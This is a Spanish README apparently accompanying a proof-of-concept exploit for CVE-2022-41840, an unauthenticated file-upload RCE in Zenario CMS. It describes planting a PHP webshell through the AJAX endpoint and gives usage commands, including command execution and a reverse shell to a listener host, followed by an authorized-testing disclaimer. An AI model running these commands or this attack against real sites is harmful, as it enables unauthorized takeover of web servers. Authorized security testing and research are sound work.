
Este es el exploit PoC para CVE-2022-41840, ejecutándose en Zenario.
Una vulnerabilidad de ejecución remota de código (RCE) no autenticada que afecta a Zenario CMS versión 9.3 y anteriores. El exploit aprovecha una vulnerabilidad de carga de archivos en el endpoint AJAX para subir un webshell PHP y lograr ejecución de código.
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requestsInstalar dependencias:
pip install requests
Solo con fines educativos y de pruebas de seguridad autorizadas.
Esta herramienta se proporciona para investigadores de seguridad y testers de penetración para probar sistemas que poseen o tienen autorización explícita para probar. El acceso no autorizado a sistemas informáticos es ilegal y está estrictamente prohibido.
Los mantenedores no asumen ninguna responsabilidad por el mal uso o daños causados por esta herramienta.
Este código se proporciona con fines educativos.